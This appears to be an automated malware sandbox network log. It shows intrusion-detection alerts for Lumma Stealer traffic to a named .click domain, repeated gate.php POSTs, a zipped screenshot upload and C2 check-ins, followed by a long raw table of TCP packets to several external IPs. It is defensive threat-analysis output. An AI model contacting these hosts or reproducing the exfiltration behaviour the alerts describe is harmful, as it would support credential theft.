                                                                                                                                                                                                                                                                                        2024-12-12T16:50:40.450539+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050271172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:40.450539+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050271172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:41.581306+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050275185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:41.581306+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050275185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:41.581306+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050275185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:43.338354+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050284172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:43.338354+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050284172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:43.584964+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050288185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:43.584964+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050288185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:43.584964+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050288185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:45.346981+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050294185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:45.346981+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050294185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:45.346981+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050294185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:47.034246+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050296185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:47.034246+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050296185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:47.034246+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050296185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:48.854420+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050300185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:48.854420+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050300185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:48.854420+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050300185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:49.617379+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050299172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:49.617379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050299172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:50.537748+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050302185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:50.537748+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050302185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:50.537748+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050302185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:50.833525+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1050299172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.161845+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050308172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.161845+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050308172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.370878+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050311185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.370878+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050311185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.370878+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050311185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:52.876874+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1050308172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:54.079049+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050316185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:54.079049+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050316185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:54.079049+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050316185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:55.996365+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050319185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:55.996365+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050319185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:55.996365+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050319185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:57.999225+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050329185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:57.999225+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050329185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:57.999225+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050329185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:59.837977+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050330185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:59.837977+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050330185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:59.837977+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050330185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:01.617885+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050332185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:01.617885+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050332185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:01.617885+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050332185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:07.739107+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050337185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:07.739107+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050337185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:07.739107+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050337185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:09.658808+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050339185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:09.658808+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050339185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:51:09.658808+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050339185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.323788881 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.443667889 CET8049848185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.446244955 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.446523905 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.566294909 CET8049848185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:06.778474092 CET8049848185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:06.778525114 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.292265892 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.292612076 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.412513971 CET8049856185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.412600040 CET8049848185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.413150072 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.413150072 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.413289070 CET4984880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.532957077 CET8049856185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.786029100 CET8049856185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.786041021 CET8049856185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.786204100 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.790427923 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.910229921 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.910548925 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.910969973 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:10.031380892 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236073017 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236115932 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236128092 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236258984 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236269951 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236280918 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236304998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236304998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236304998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236347914 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236366987 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236375093 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236381054 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236448050 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236664057 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236664057 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236664057 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.356235981 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.356332064 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.356353998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.356595993 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.360479116 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.360538960 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.360563040 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.360590935 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.428339005 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.428472996 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.428524017 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.428524017 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.432656050 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.432707071 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.432742119 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.432806015 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.440970898 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.441070080 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.441071987 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.441709042 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.449525118 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.449639082 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.449738979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.449738979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.457988977 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.458067894 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.458076000 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.458177090 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.466394901 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.466444969 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.466480970 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.467314959 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.474716902 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.474780083 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.475164890 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.475164890 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.483006954 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.483104944 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.483206987 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.491422892 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.491508007 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.491523981 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.491569996 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.499799967 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.499885082 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.499886036 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.500413895 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.507483959 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.507617950 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.507625103 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.507807016 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.515234947 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.515280962 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.515491962 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.620639086 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.620928049 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.620932102 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.620982885 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.622785091 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.622874975 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.622904062 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.622961998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.627365112 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.627419949 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.627604008 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.627753019 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.632024050 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.632092953 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.632116079 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.632169008 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.636385918 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.636430025 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.636499882 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.636569977 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.640927076 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.640954971 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.640980959 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.640993118 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.645639896 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.645714045 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.645754099 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.645798922 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.650002003 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.650068998 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.650083065 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.650188923 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.654520988 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.654619932 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.654665947 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.654706001 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.659046888 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.659112930 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.659161091 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.659205914 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.663563967 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.663729906 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.663949013 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.663949013 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.668123007 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.668137074 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.668186903 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.672725916 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.672811031 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.672835112 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.672884941 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.677120924 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.677225113 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.677270889 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.677320957 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.681669950 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.681816101 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.682172060 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.682172060 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.686207056 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.686302900 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.686374903 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.686439037 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.690728903 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.690781116 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.691338062 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.691338062 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.695300102 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.695496082 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.696218967 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.696218967 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.699819088 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.699908018 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.702017069 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.702017069 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.704586983 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.704677105 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.704701900 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.704783916 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.708827019 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.708915949 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.708925962 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.709003925 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.713498116 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.713556051 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.713587999 CET804985831.41.244.11192.168.2.10
